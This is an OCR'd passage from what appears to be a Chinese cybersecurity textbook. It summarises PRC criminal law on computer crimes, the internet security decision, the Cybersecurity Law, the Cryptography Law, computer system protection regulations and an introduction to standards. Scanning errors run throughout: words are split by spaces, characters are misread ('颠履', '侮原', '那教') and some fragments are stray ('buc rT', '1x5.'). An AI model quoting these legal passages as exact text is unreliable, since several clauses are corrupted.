非法 控制 计算 机 信息 系统 的 违法 犯罪 行为 而 为 其 提供 程序 .工具 ,情节 严重 的 ,依照 前 款 
的 规定 处 罚 。 

单位 犯 前 三 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 
员 ,依照 各 该 款 的 规定 处 罚 。 
。 第 二 百 八 十 六 条 ”违反 国家 规定 ,对 计算 机 信息 系统 功能 进行 删除 修改、 增加 、 
干扰 ,造成 计算 机 信息 系统 不 能 正常 运行 ,后 果 严 重 的 ,处 五 年 以 下 有 期 徒刑 或 者 
拘役 ;后 果 特 别 严重 的 ,处 五 年 以 上 有 期 徒刑 。 
违反 国家 规定 ,对 计算 机 信息 系统 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删 
除 、 修 改 、 增 加 的 操作 ,后 果 严 重 的 ,依照 前 款 的 规定 处 罚 。 

故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 ,影响 计算 机 系统 正常 运行 ,后 果 严 重 的 , 依 
照 第 一 款 的 规定 处 罚 。 

单位 犯 前 三 款 罪 的 ,对 单位 判处 罚金 ,并 对 其 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 
员 ,依照 第 一 款 的 规定 处 罚 。 

。 第 二 百 八 十 七 条 利用 计算 机 实施 金融 诈骗 .盗窃 贪污 、 挪 用 公款 、 窃 取 国 家 秘 
密 或 者 其 他 犯罪 的 ,依照 本 法 有 关 规 定 定罪 处 罚 。 


1.3.3 互联 网 安全 的 刑事 责任 


第 九 届 全 国人 民 代表 大 会 常务 委员 会 第 十 九 次 会 议 通过 了 《全 国人 民 代表 大 会 常务 
委员 会 关于 维护 互联 网 安全 的 决定 》, 主 要 条 款 如 下 : 
一 、 为 了 保障 互联 网 的 运行 安全 ,对 有 下 列 行为 之 一 ,构成 犯罪 的 ,依照 刑法 有 关 规 
定 追 究 刑 事 责任 : 
(一 ) 侵入 国家 事务 、 国 防 建设 .尖端 科学 技术 领域 的 计算 机 信息 系统 ; 
(二 ) 故意 制作 、 传 播 计算 机 病毒 等 破坏 性 程序 ,攻击 计算 机 系统 及 通信 和 网络, 致使 计 
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算 机 系统 及 通信 网 络 遭 受 损 害 ; 

CA) 违反 国家 规定 ,擅自 中 断 计 算 机 网 络 或 者 通信 服务 ,造成 计算 机 网 络 或 者 通信 
系统 不 能 正常 运行 。 

二 、 为 了 维护 国家 安全 和 社会 稳定 ,对 有 下 列 行为 之 一 ,构成 犯罪 的 ,依照 刑法 有 关 
规定 追究 刑事 责任 : 

(一 ) 利用 互联 网 造谣 、 诽 谤 或 者 发 表 、 传 播 其 他 有 害 信 息 , 煽 动 颠 履 国 家 政权 、 推 翻 
社会 主义 制度 ,或 者 煽动 分 裂 国 家 、 破 坏 国家 统一 ; 

(二 ) 通过 互联 网 窃取 、 泄 露 国 家 秘密 、 情 报 或 者 军事 秘密 ; 

(三 ) 利用 互联 网 煽动 民族 仇恨 、 民 族 歧 视 , 破 坏 民族 团结 ; 

(四 ) 利用 互联 网 组 织 邪 教 组 织 、 联 络 那 教 组 织 成 员 , 破 坏 国家 法 律 、 行 政法 规 实施 。 

三 、 为 了 维护 社会 主义 市 场 经 济 秩序 和 社会 管理 秩序 ,对 有 下 列 行为 之 一 ,构成 犯罪 
的 ,依照 刑法 有 关 规 定 追 究 刑 事 责任 : 

(一 ) 利用 互联 网 销售 伪劣 产品 或 者 对 商品 、 服 务 作 虚假 宣传 ; 

(二 ) 利用 互联 网 损坏 他 人 商业 信誉 和 商品 声誉 ; 

(三 ) 利用 互联 网 侵犯 他 人 知识 产权 ; 

(四 ) 利用 互联 网 编造 并 传播 影响 证 券 、 期 货 交易 或 者 其 他 扰乱 金融 秩序 的 虚假 
信息 ; 

(五 ) 在 互联 网 上 建立 淫秽 网 站 、 网 页 ,提供 淫秽 站 点 链接 服务 ,或 者 传播 淫秽 书刊 、 
影片 音像、 图 片 。 

四 、 为 了 保护 个 人 ,法 人 和 其 他 组 织 的 人 身 、 财 产 等 合法 权利 ,对 有 下 列 行为 之 一 , 构 
成 犯罪 的 ,依照 刑法 有 关 规 定 追 究 刑 事 责 任 ; 

(一 ) 利用 互联 网 侮 原 他 人 或 者 捏造 事实 诽谤 他 人 ; 

(二 ) 非法 截获 、 纂 改 、 删 除 他 人 电子 邮件 或 者 其 他 数据 资料 ,侵犯 公民 通信 自由 和 通 
信 秘 密 ; 

(A) 利用 互联 网 进行 和 盗 窃 、. 诈 骗 . 敲 诈 勒索 。 

五 、 利 用 互联 网 实施 本 决定 第 一 条 、 第 二 条 、 第 三 条 、 第 四 条 所 列 行为 以 外 的 其 他 行 
为 ,构成 犯罪 的 ,依照 刑法 有 关 规 定 追 究 刑 事 责任 。 

六 、 利 用 物 联 网 实施 违法 行为 ,违法 社会 治安 管理 , 尚 不 构成 犯罪 的 ,由 公安 机 关 依 
照 (治安 管理 处 罚 法 ) 予 以 处 罚 ; 违 反 其 他 法 律 、 行 政法 规 , 尚 不 构成 犯罪 的 ,由 有 关 行 政 管 
理 部 门 依 法 给 予 行政 处 罚 ; 对 直接 负责 的 主管 人 员 和 其 他 直接 责任 人 员 ,依法 给 予 行政 处 
分 或 纪律 处 分 。 

利用 互联 网 侵犯 他 人 合法 权益 ,构成 民事 侵权 的 ,依法 承担 民事 责任 。 


1.3.4 中 华人 民 共 和 国 网 络 安全 法 
长 期 以 来 ,我 国 网 络 安全 法 律 法 规 体系 建设 滞后 ,没有 一 部 真正 意义 上 的 网 络 安全 
法 。《 网 络 安全 法 ) 的 通过 ,解决 了 我 国 网 络 安 全 “基本 法 "的 问题 ,我 国 网 络 安全 工作 从 此 


有 了 基础 性 的 法 律 框 架 。 
《网 络 安全 法 ) 共 7 章 79 条 ,第 一 章 总 则 ;第 二 章 网 络 安 全 支持 与 促进 ;第 三 章 网 络 运 
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行 安全 ;第 四 章 网 络 信息 安全 ;第 五 章 监测 预警 与 应 急 处 置 ;第 六 章法 律 责 任 ;第 七 章 附 
则 。 在 内 容 方 面 有 六 个 突出 的 亮点 ,一 是 确立 了 我 国 网 络 空 间 主权 原则 ;二 是 规定 了 网 络 
产品 和 服务 提供 者 、 网 络 运营 者 保证 网 络 安全 的 法 定义 务 ; 三 是 明确 了 政府 职能 部 门 的 监 
管 职责 ,完善 了 监管 体制 ;四 是 强化 了 网 络 运行 安全 ,明确 了 重点 保护 对 象 为 关键 信息 基 
础 设施 ,彰显 了 个 人 信息 保护 原则 ;五 是 明确 规定 了 网 络 产品 和 服务 、 网 络 关键 设备 和 网 
络 安全 产品 的 强制 性 要 求 的 准则 ;六 是 强化 了 危害 网 络 安全 责任 人 处 罚 .《 网 络 安全 法 》 
的 基本 内 容 见 下 文 。 


1. 关于 维护 网 络 主权 和 战略 规划 

网 络 主权 是 国家 主权 在 网 络 空间 的 体现 和 延伸 ,网 络 主权 原则 是 我 国 维护 国家 安全 
和 利益 、 参 与 网 络 国际 治理 与 合作 所 坚持 的 重要 原则 。 为 此 ,《 网 络 安全 法 ) 第 一 条 把 “为 
了 保障 网 络 安全 ,维护 网 络 空 间 主 权 和 国家 安全 、 社 会 公共 利益 ,保护 公民 、 法 人 和 其 他 组 
织 的 合法 权益 ,促进 经 济 社会 信息 化 健康 发 展 ,制定 本 法 ”作为 立法 宗旨 。 第 二 条 规定 ， 
“在 中 华人 民 共 和 国境 内 建设 运营、 维护 和 使 用 网 络 ,以 及 网 络 安全 的 监督 管理 ,适用 本 
法 。 宣 示 了 对 我 国境 内 相关 网 络 活动 的 管辖 权 。 第 五 条 规定 “国家 采取 措施 ,监测 、 防 
御 、 处 置 来 源 于 中 华人 民 共 和 国境 内 外 的 网 络 安全 风险 和 威胁 ,保护 关键 信息 基础 设施 免 
受 攻击 .侵入 .干扰 和 破坏 ,依法 惩治 网 络 违法 犯罪 活动 ,维护 网 络 空间 安全 和 秩序 。 "对 攻 
击 、 破 坏 我 国 关键 信息 基础 设施 的 境内 外 组 织 和 个 人 ,如 造成 严重 后 果 将 依法 追究 法 律 责 
任 , 充 分 体现 我 国保 护 网 络 主权 不 受 侵犯 ,维护 网 络 空间 秩序 的 坚定 立场 。 同 时 ,按照 安 
全 与 发 展 并 重 的 原则 , 设 专 章 (第 二 章 ) 对 国家 网 络 安全 战略 和 重要 领域 网 络 安全 规划 、 促 
进 网 络 安全 的 支持 措施 作 了 规定 。 


2. 明确 规定 了 政府 各 部 门 的 职责 权限 ,使 网 络 安全 监管 体制 法 制 化 

《网 络 安全 法 》 第 八条 规定 “国家 网 信 部 门 负责 统筹 协调 网 络 安全 工作 和 相关 监督 管 
理工 作 。 国 务 院 电信 主管 部 门 .公安 部 门 和 其 他 有 关机 关 依 照 本 法 和 有 关 法 律 , 行 政法 规 
的 规定 ,在 各 自 职责 范围 内 负责 网 络 安 全 保护 和 监督 管理 工作 。 县 级 以 上 地 方 人 民政 府 
有 关 部 门 的 网 络 安 全 保护 和 监督 管理 职责 ,按照 国家 有 关 规 定 确定 .” 将 现行 的 网 络 安 全 
监管 体制 法 制 化 ,将 制度 上 升 为 法 律 ,用 法 律 条 款 明 确 规定 了 网 信 部 门 与 其 他 相关 网 络 监 
管 部 门 的 职责 分 工 。 这 种 一 个 部 门 牵头 、 多 部 门 协同 的 监管 体制 ,符合 当前 互联 网 与 现实 
社会 全 面 融 合 的 特点 ,满足 我 国 监管 需要 ,解决 了 监管 工作 分 工 不 明 、 责 权 不 清 的 现实 问 
题 , 对 提高 监管 效率 和 治理 效果 具有 积极 意义 。 


3. 关于 保障 网 络 产品 和 服务 安全 
维护 网 络 安全 ,首先 要 保障 网 络 产品 和 服务 的 安全 《网 络 安全 法 》 主 要 作 了 以 下 规 
定 : 第 二 十 二 条 规定 了 网 络 产品 .服务 的 提供 者 不 得 设置 恶意 程序 ,及 时 向 用 户 告知 安全 
缺陷 漏洞 等 风险 ,持续 提供 安全 维护 服务 ,没有 经 过 用 户 同意 不 得 收集 用 户 的 信息 ,应当 
遵循 相关 法 律 法 规 提供 个 人 信息 保护 ,明确 了 网 络 产品 和 服务 提供 者 的 安全 义务 ;第 二 十 
三 条 规定 将 网 络 关键 设备 和 网 络 安全 专用 产品 的 安全 认证 和 安全 检测 制度 上 升 为 法 律 并 
进行 了 必要 的 规范 ;第 三 十 五 条 规定 “关键 信息 基础 设施 的 运营 者 采购 网 络 产 品 和 服务 ， 
可 能 影响 国家 安全 的 ,应 当 通 过 国家 网 信 部 门 会 同 国务 院 有 关 部 门 组 织 的 国家 安全 审 
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查 ”, 建 立 了 关键 信息 基础 设施 运营 者 采购 网 络 产 品 、 服 务 的 安全 审查 制度 


4. 关于 保障 网 络 运行 安 

buc rT 据 此 ,《 网 络 安全 法 ) 第 
二 十 一 条 规定 将 现行 的 网 络 安 全 等 级 保护 制度 上 升 为 法 律 ,要 求 网 络 运 营 者 按照 网 络 安 
全 等 级 保护 制度 的 要 求 , 采 取 相 应 的 管理 措施 和 技术 防范 等 措施 ,履行 相应 的 网 络 安全 保 
1x5. 

为 了 保障 关键 信息 基础 设施 安全 ,维护 国家 安全 、 经 济 安全 和 保障 民生 ,网 络 安全 
法 》 设 专 节 对 关键 信息 基础 设施 的 运行 安全 作 了 规定 ,指出 国家 对 公共 通信 和 信息 服务 、 
能 源 、 交 通 、 水 利 、 金 融 、 公 共 服 务 、 电 子 政务 等 重要 行业 和 领域 的 关键 信息 基础 设施 实行 
重点 保护 ,并 对 关键 信息 基础 设施 安全 保护 办 法 的 制定 、 负 责 安全 保护 工作 的 部 门 、 运 营 
者 的 安全 保护 义务 有 关 部 门 的 监督 和 支持 等 作 了 规定 ( 见 (网 络 安全 法 ) 第 三 十 一 条 至 三 
十 九条 )。 


5. 关于 保障 网 络 数 据 安全 

随 着 云 计算 、 大 数据 等 技术 的 发 展 和 应 用 ,网 络 数据 安全 对 维护 国家 安全 经 济 安全 ， 
保护 公民 合法 权益 ,促进 数据 利用 至 为 重要 。 为 此 ,《 网 络 安 全 法 ) 作 了 以 下 几 方 面 的 规 
定 : 要 求 网 络 运营 者 采取 数据 分 类 、 重 要 数据 备份 和 加 密 等 措施 ,防止 网 络 数据 泄露 或 
者 被 穷 取 、 自 改 ( 见 (网 络 安 全 法 ) 第 二 十 一 条 ); @ 加 强 对 公民 个 人 信息 的 保护 ,防止 公民 
个 人 信息 数据 被 非法 获取 、 泄 露 或 者 非法 使 用 ( 见 (网 络 安全 法 ) 第 四 十 条 至 第 四 十 五 条 ); 
@ 要 求 关键 信息 基础 设施 的 运营 者 在 中 华人 民 共 和 国境 内 运营 中 收集 和 产生 的 个 人 信息 
和 重要 数据 应 当 在 境内 存储 。 因 业务 需要 , 确 需 向 境外 提供 的 ,应 当 按照 规定 进行 安全 评 
估 ( 见 (网络 安全 法 ) 第 三 十 七 条 )。 


6. 关于 保障 网 络 信息 安全 

2012 年 ,全 国人 大 常委 会 关于 加 强 网 络 信息 保护 的 决定 对 规范 网 络 信息 传播 活动 作 
了 原则 规定 .《 网 络 安全 法 ;坚持 加 强 网 络 信息 保护 的 决定 确立 的 原则 ,进一步 完善 了 相 
关 管理 制度 。Q@ 确 立 决 定 规定 的 网 络 身 份 管理 制度 即 网 络 实名 制 ,以 保障 网 络 信 息 的 可 
追溯 ( 见 (网 络 安全 法 ) 第 二 十 四 条 ); 巴 明 确 网 络 运营 者 处 置 违 法 信息 的 义务 ,规定 网 络 
运营 者 发 现 法 律 , 行 政法 规 禁止 发 布 或 者 传输 的 信息 的 ,应 当 立 即 停止 传输 该 信息 ,采取 
消除 等 处 置 措 施 ,防止 信息 扩散 ,保存 有 关 记 录 , 并 向 有 关 主 管 部 门 报告 ( 见 (网 络 安全 法 》 
第 四 十 七 条 );@@ 规 定 发 送 电子 信息 、 提 供应 用 软件 不 得 含有 法 律 行政 法 规 禁 止 发 布 或 者 
传输 的 信息 ( 见 ( 网 络 安全 法 ) 第 四 十 八条 ) ;@ 为 维护 国家 安全 和 侦查 犯罪 的 需要 ,公安 机 
关 、 国 家 安全 机 关 依 照 法 律 规定 ,可 以 要 求 网 络 运营 者 提供 必要 的 支持 与 协助 ( 见 ( 网 络 安 
全 法 ) 第 二 十 八条 ); 加 赋予 有 关 主 管 部 门 处 置 违法 信息 、 阻 断 违法 信息 传播 的 权力 ( 见 
《网 络 安全 法 ) 第 五 十 条 )。 


7. 关于 监测 预警 与 应 急 处 置 

为 了 加 强国 家 的 网 络 安全 监测 预警 和 应 急 制度 建设 ,提高 网 络 安全 保障 能 力 ,《 网 络 
安全 法 ) 作 了 以 下 规定 :中 要 求 国务 院 有 关 部 门 建立 健全 网 络 安全 监测 预警 和 信息 通报 制 
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度 ,加 强 网 络 安全 信息 收集 、 分 析 和 情况 通报 工作 (网 络 安全 法 ) 第 五 十 一 条 、 第 五 十 二 
条 )。 名 建立 网 络 安全 应 急 工 作 机 制 ,制定 应 急 预案 (网 络 安全 法 ;} 第 五 十 三 条 )。 回 规定 
预警 信息 的 发 布 及 网 络 安全 事件 应 急 处 置 措施 (网 络 安全 法 》 第 五 十 四 条 至 第 五 十 六 
条 ) 。 甸 为 维护 国家 安全 和 社会 公共 秩序 ,处 置 重大 突 发 社会 安全 事件 ,对 网 络 管制 作 了 
规定 (网络 安全 法 》 第 五 十 七 条 至 五 十 八条 ) 。 


8. 关于 网 络 安全 监督 管理 体制 

为 加 强 网 络 安全 工作 ,《 网 络 安全 法 ) 规 定 : 国家 网 信和 部 门 负责 统筹 协调 网 络 安全 工 
作 和 相关 监督 管理 工作 ,并 在 一 些 条 款 中 明确 规定 了 其 协调 和 管理 职能 。 同 时 规定 ,国务 
院 电 信和 主管 部 门 ` 公 安 部 门 和 其 他 有 关机 关 按照 各 自 职责 负责 网 络 安全 保护 和 监督 管理 
相关 工作 (《 网 络 安全 法 ;} 第 八条 )。 此 外 ,网 络 安全 法 》 还 对 违反 本 法 规定 的 法 律 责任 . 相 
关 用 语 的 含义 等 作 了 规定 。 


1.83.5 中 华人 民 共 和 国 密码 法 


2019 年 10 月 26 日 ,第 十 三 届 全 国人 大 常委 会 第 十 四 次 会 议 审 议 通 过 《中 华人 民 共 
和 国 密码 法 》( 以 下 简称 (密码 法 》) , 自 2020 年 1 月 1 日 起 施行 。 《密码 法 ) 是 总 体 国家 安 
全 观 框 架 下 ,国家 安全 法 律 体系 的 重要 组 成 部 分 ,其 颁布 实施 将 极 大 提升 密码 工作 的 科学 
化 .规范 化 法治 化 水 平 ,有 力促 进 密码 技术 进步 、 产 业 发 展 和 规范 应 用 ,切实 维护 国家 安 
全 ,社会 公共 利益 以 及 公民 、 法 人 和 其 他 组 织 的 合法 权益 ,同时 也 将 为 密码 部 门 提高 “三 服 
务 " 能 力 提 供 坚 实 的 法 治 保 障 。 

《密码 法 ) 共 五 章 四 十 四 条 ,重点 规范 了 以 下 内 容 。 


1. 什么 是 密码 
《密码 法 ) 第 二 条 规定 ,“ 本 法 所 称 密码 ,是 指 采 用 特定 变换 的 方法 对 信息 等 进行 加 密 
保护 、 安 全 认证 的 技术 、 产 品 和 服务 ”密码 是 保障 网 络 与 信息 安全 的 核心 技术 和 基础 支 
撑 , 是 解决 网 络 与 信息 安全 问题 最 有 效 、 最 可 靠 、 最 经 济 的 手段 ; 它 就 像 网 络 空间 的 
DNA .是 构筑 网 络 信息 系统 免疫 体系 和 网 络 信 任 体系 的 基石 ,是 保护 党 和 国家 根本 利益 
的 战略 性 资源 ,是 国之 重 器 。 第 六 条 至 第 八条 明确 了 密码 的 种 类 及 其 适用 范围 ,规定 核心 
密码 用 于 保护 国家 绝密 级 .机 密级 、 秘 密级 信息 ,普通 密码 用 于 保护 国家 机 密级 、 秘 密级 信 
息 , 商 用 密码 用 于 保护 不 属于 国家 秘密 的 信息 。 对 密码 实行 分 类 管理 ,是 党 中 央 确 定 的 密 
码 管 理 根 本 原则 ,是 保障 密码 安全 的 基本 策略 ,也 是 长 期 以 来 密码 工作 经 验 的 科学 总 结 。 
2. 谁 来 管 密码 
《密码 法 ) 第 四 条 规定 ,要 坚持 党 管 密 码 的 根本 原则 ,依法 确立 密码 工作 领导 体制 ,并 
明确 中 央 密 码 工作 领导 机 构 , 即 中 央 密 码 工作 领导 小 组 (国家 密码 管理 委员 会 ) ,对 全 国 密 
码 工作 实行 统一 领导 ;要 把 中 央 确 定 的 领导 管理 体制 ,通过 法 律 形式 固定 下 来 , 变 成 国家 
意志 ,为 密码 工作 沿 着 正确 方向 发 展 提供 根本 保证 。 中 央 密 码 工作 领导 小 组 负责 制定 国 
家 密码 重大 方针 政策 ,统筹 协调 国家 密码 重大 事项 和 重要 工作 ,推进 国家 密码 法 治 建设 。 
《密码 法 ) 第 五 条 确立 了 国家 、 省 、 市 .县 四 级 密码 工作 管理 体制 。 国 家 密码 管理 部 门 ( 即 国 
家 密码 管理 局 ) 负 责 管理 全 国 的 密码 工作 ;县 级 以 上 地 方 各 级 密码 管理 部 门 ( 即 省 市、 县 
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级 密码 管理 局 ) 负 责 管理 本 行政 区 域 的 密码 工作 ;国家 机 关 和 涉及 密码 工作 的 单位 在 其 职 
责 范 围 内 负责 本 机 关 、 本 单位 或 者 本 系统 的 密码 工作 。 


3. 怎么 管 密码 

《密码 法 ) 第 二 章 (第 十 三 条 至 第 二 十 条 ) 规 定 了 核心 密码 .普通 密码 的 主要 管理 制度 。 
核心 密码 .普通 密码 用 于 保护 国家 秘密 信息 和 涉 密 信息 系统 ,有 力 地 保障 了 中 央 政 令 军 令 
安全 ,为 维护 国家 网 络 空间 主权 、 安 全 和 发 展 利益 构筑 起 牢 不 可 破 的 密码 屏障 .。 《密码 法 》 
明确 规定 ,密码 管理 部 门 依法 对 核心 密码 .普通 密码 实行 严格 统一 管理 ,并 规定 了 核心 密 
码 普通 密码 使 用 要 求 , 安 全 管理 制度 以 及 国家 加 强 核心 密码 .普通 密码 工作 的 一 系列 特 
殊 保 障 制度 和 措施 。 核 心 密码 .普通 密码 本 身 就 是 国家 秘密 ,一 旦 泄密 ,将 危害 国家 安全 
和 利益 。 因 此 ,有 必要 对 核心 密码 .普通 密码 的 科研 生产 、 服 务 、 检 测 、 装 备 . 使 用 和 销毁 
等 各 个 环节 实行 严格 统一 管理 ,确保 核心 密码 .普通 密码 的 安全 《密码 法 } 第 三 章 ( 第 二 
十 一 条 至 第 三 十 一 条 ) 规 定 了 商用 密码 的 主要 管理 制度 。 商 用 密码 广泛 应 用 于 国民 经 济 
发 展 和 社会 生产 生活 的 方方面面 ,涵盖 金融 和 通信 、 公 安 、 税 务 、 社 保 、 交 通 、 卫 生 健 康 、 能 
源 、 电 子 政务 等 重要 领域 ,积极 服务 “互联 网 + ”行动 计划 ,智慧 城 市 和 大 数据 战略 ,在 维护 
国家 安全 ,促进 经 济 社会 发 展 以 及 保护 公民 、 法 人 和 其 他 组 织 合法 权益 等 方面 发 挥 着 重要 
作用 。《 密 码 法 ) 明 确 规定 ,国家 鼓励 商用 密码 技术 的 研究 开发 .学 术 交 流 、 成 果 转 化 和 推 
广 应 用 ,健全 统一 、 开 放 、 竞 争 有 序 的 商用 密码 市 场 体系 ,鼓励 和 促进 商用 密码 产业 发 展 。 
一 是 坚决 贯彻 落实 * 放 管 服 ”改革 要 求 ,充分 体现 非 歧视 和 公平 竞争 原则 ,进一步 削减 行 
政 许 可 数量 ,放宽 市 场 准 入 ,更 好 地 激发 市 场 活力 和 社会 创造 力 ;二 是 由 商用 密码 管理 条 
例 规定 的 全 环节 严格 管理 调整 为 重点 把 控 产 品 销售 、 服 务 提供 、 使 用 、 进 出 口 等 关键 环节 ， 
管理 方式 上 由 重 事前 审批 转 为 重 事 中 事后 监管 ,重视 发 挥 标准 化 和 检测 认证 的 支撑 作用 ， 
三 是 对 于 关系 国家 安全 和 社会 公共 利益 ,又 难以 通过 市 场 机 制 或 者 事 中 事后 监管 方式 进 
行 有 效 监管 的 少数 事项 ,规定 了 必要 的 行政 许可 和 管制 措施 。 按 照 上 述 立法 思路 《密码 
法 ) 规 定 了 商用 密码 的 主要 管理 制度 ,包括 商用 密码 标准 化 制度 .检测 认证 制度 市场 准 入 
管理 制度 .使 用 要 求 . 进 出 口 管理 制度 .电子 政务 电子 认证 服务 管理 制度 以 及 商用 密码 事 
中 事后 监管 制度 。 


4. 怎么 用 密码 

对 于 核心 密码 .普通 密码 的 使 用 《密码 法 }? 第 十 四 条 要 求 : 在 有 线 、 无 线 通信 中 传递 
的 国家 秘密 信息 ,以 及 存储 ,处理 国 家 秘密 信息 的 信息 系统 ,应 当 依法 使 用 核心 密码 ,普通 
密码 进行 加 密 保护 ,安全 认证 。 对 于 商用 密码 的 使 用 ,一 方面 ,第 八条 规定 公民 、 法 人 和 其 
他 组 织 可 以 依法 使 用 商用 密码 保护 网 络 与 信息 安全 ,对 一 般 用 户 使 用 商用 密码 没有 提出 
强制 性 要 求 ; 另 一 方面 ,为 了 保障 关键 信息 基础 设施 安全 稳定 运行 ,维护 国家 安全 和 社会 
公共 利益 《密码 法 ) 第 二 十 七 条 要 求 关 键 信息 基础 设施 必须 依法 使 用 商用 密码 进行 保护 ， 
并 开展 商用 密码 应 用 安全 性 评估 ,要 求 关 键 信息 基础 设施 的 运营 者 采购 涉及 商用 密码 的 
网 络 产 品 和 服务 ,可 能 影响 国家 安全 的 ,应 当 依法 通过 国家 网 信 部 门 会 同 国家 密码 管理 部 
门 等 有 关 部 门 组 织 的 国家 安全 审查 。 党 政 机 关 存 在 大 量 的 涉 密 信息 、 信 息 系 统 和 关键 信 
息 基 础 设施 ,都 必须 依法 使 用 密码 进行 保护 。 此 外 ,由 于 密码 属于 两 用 物 项 《密码 法 》 第 
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十 二 条 还 明确 规定 ,任何 组 织 或 者 个 人 不 得 窃取 他 人 加 密 保 护 的 信息 或 者 非法 侵入 他 人 
的 密码 保障 系统 ,不 得 利用 密码 从 事 危 害 国 家 安全 、 社 会 公共 利益 、 他 人 合法 权益 等 违法 
犯罪 活动 。 


1.3.6 ”中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 


1994 年 2 月 18 日 ,中 华人 民 共 和 国 国 务 院 令 第 147 号 发 布 了 (中 华人 民 共 和 国 计 算 
机 信息 系统 安全 保护 条 例 》。 该 条 例 是 我 国 在 信息 系统 安全 保护 方面 最 早 制定 的 一 部 法 
规 ,也 是 我 国信 息 系统 安全 保护 最 基本 的 一 部 法 规 , 它 确立 了 我 国信 息 系统 安全 保护 的 基 
本 原则 ,为 以 后 相关 法 规 的 制定 莫 定 了 基础 。 条 例 的 宗旨 是 保护 计算 机 信息 系统 的 安全 ， 
促进 计算 机 的 应 用 和 发 展 ,保障 社会 主义 现代 化 建设 的 顺利 进行 。 该 条 例 中 计算 机 信息 
系统 的 概念 ,是 指 由 计算 机 及 其 相关 的 和 配套 的 设备 ,设施 和 网 络 构成 的 ,按照 一 定 的 应 
j 目标 和 规则 对 信息 进行 采集 ,加工 .存储 、 传 输 、 检 索 等 处 理 的 人 机 系统 。 
该 条 例 有 如 下 适用 范围 : 
条例 适用 于 组 织 和 个 人 ; 
Q) 中 华人 民 共 和 国境 内 的 计算 机 信息 系统 的 安全 保护 适用 本 条 例 ; 
@ 未 联网 的 微型 计算 机 的 安全 保护 不 适用 本 条 例 ; 
@ 军队 的 计算 机 信息 系统 安全 保护 工作 ,按照 军队 的 有 关 法 规 执 行 。 
计算 机 信息 系统 安全 保护 的 内 容 是 : 保障 计算 机 及 其 相关 的 和 配套 的 设备 .设施 和 
网 络 的 安全 ,运行 环境 的 安全 ,保障 信息 的 安全 ,保障 计算 机 功能 的 正常 发 挥 ,维护 计算 机 
信息 系统 的 安全 运行 。 其 中 重点 维护 国家 事务 ,经济 建设 .国防 建设 、 尖 锐 科学 技术 等 重 
要 领域 的 计算 机 信息 系统 的 安全 。 
该 条 例 明确 确定 了 安全 监督 的 职权 和 义务 。 公 安 机 关 对 计算 机 信息 系统 保护 工作 行 
使 下 列 监督 职权 : 
(D 监督 检查、 指导 计算 机 信息 系统 安全 保护 工作 ; 
@ 查处 危害 计算 机 信息 系统 安全 的 违法 犯罪 案件 ; 
C 履行 计算 机 信息 系统 安全 保护 工作 的 其 他 监督 职责 。 
同时 ,车 公安 机 关 发 现 影响 计算 机 信息 系统 安全 的 隐患 时 ,应 当 及 时 通知 使 用 单位 采 
用 保护 措施 。 在 紧急 情况 下 ,可 以 就 涉及 计算 机 信息 系统 安全 的 特定 事项 发 布 专 项 通令 。 
另外 ,该 条 例 还 系统 设置 了 以 下 安全 保护 的 制度 : 
QD 计算 机 信息 系统 实行 安全 等 级 保护 ; 
@ 计算 机 机 房 应 当 符合 国家 标准 和 国家 有 关 规 定 ; 
@ 进行 国际 联网 的 计算 机 信息 系统 ,由 计算 机 信息 系统 的 使 用 单位 报 省 级 以 上 人 民 
政府 公安 机 关 备 案 ; 
CD 运输 携带、 邮寄 计 算 机 信息 媒体 进出 境 的 ,应 当 如 实 向 海关 申报 ; 
C 计算 机 信息 系统 的 使 用 单位 应 当 建 立 健全 安全 管理 制度 ,负责 本 单位 计算 机 信息 
系统 安全 保护 工作 ; 
@ 国家 对 计算 机 信息 系统 安全 专用 产品 的 销售 实行 许可 证 制度 ; 
CD 对 计算 机 信息 系统 中 发 生 的 案件 ,有 关 使 用 单位 应 当 在 24 小 时 内 向 当地 县 级 以 
27 


可 网 络 空间 安全 导论 


上 人 民政 府 公 安 机 关 报 告 ; 

故意 输入 计算 机 病毒 以 及 其 他 有 害 数 据 危 害 计 算 机 信息 系统 安全 的 ,或 者 未 经 许 
可 出 售 计算 机 信息 系统 安全 专用 产品 的 ,由 公安 机 关 处 以 警告 或 者 相应 的 罚款 。 

这 里 的 计算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数 
据 ,影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 

这 里 的 计算 机 信息 系统 安全 专用 产品 是 指 用 于 保护 计算 机 信息 系统 安全 的 专用 硬件 
和 软件 产品 。 


1.4 信息 安全 标准 


1.4.1 技术 标准 的 基本 知识 


现代 标准 化 是 近 二 三 百年 发 展 起 来 的 ,蒸汽 机 的 出 现 和 工业 革命 的 开始 ,将 标准 化 问 
题 提 上 了 日 程 。 在 我 们 的 日 常生 活 中 ,到 处 都 可 以 见 到 按照 标准 生产 的 产品 ,如 电源 插 
头 、 电 器 的 电压 等 。 试 想 一 下 ,如 果 人 们 不 按照 统一 的 标准 生产 ,可 能 会 出 现 插 头 无 法 插 
入 插座 ,中 国 的 电器 到 美国 必须 要 进行 电压 转换 才能 使 用 。 那 么 ,什么 是 标准 呢 ? 学 术 界 
对 标准 概念 和 标准 化 的 探讨 始 于 20 世纪 30 年 代 。 目 前 广 为 使 用 的 标准 定义 是 由 ISO/ 
IEC(2004) 正 式 发 布 的 文件 给 出 的 :“ 为 在 一 定 范围 内 获得 最 佳 秩序 ,经 协商 一 臻 建立 并 
由 公认 机 构 批 准 , 为 共同 使 用 和 重复 使 用 ,对 活动 及 结果 提供 规则 、 指 导 或 给 出 特性 的 文 
件 ”。 该 定义 有 一 个 注 :“ 标 准 宜 以 科学 .技术 和 经 验 的 综合 成 果 为 基础 ,以 促进 最 佳 的 公 
共 效 益 为 目的 ”。 标 准 化 的 定义 是 :“ 为 了 在 一 定 范围 内 获得 最 佳 秩 序 , 对 现实 问题 或 潜 
在 问题 制定 共同 使 用 和 重复 使 用 的 条 款 的 活动 ”。 

通俗 地 讲 ,标准 是 通过 标准 化 活动 ,按照 规定 的 程序 经 协商 一 致 制定 ,为 各 种 活动 或 
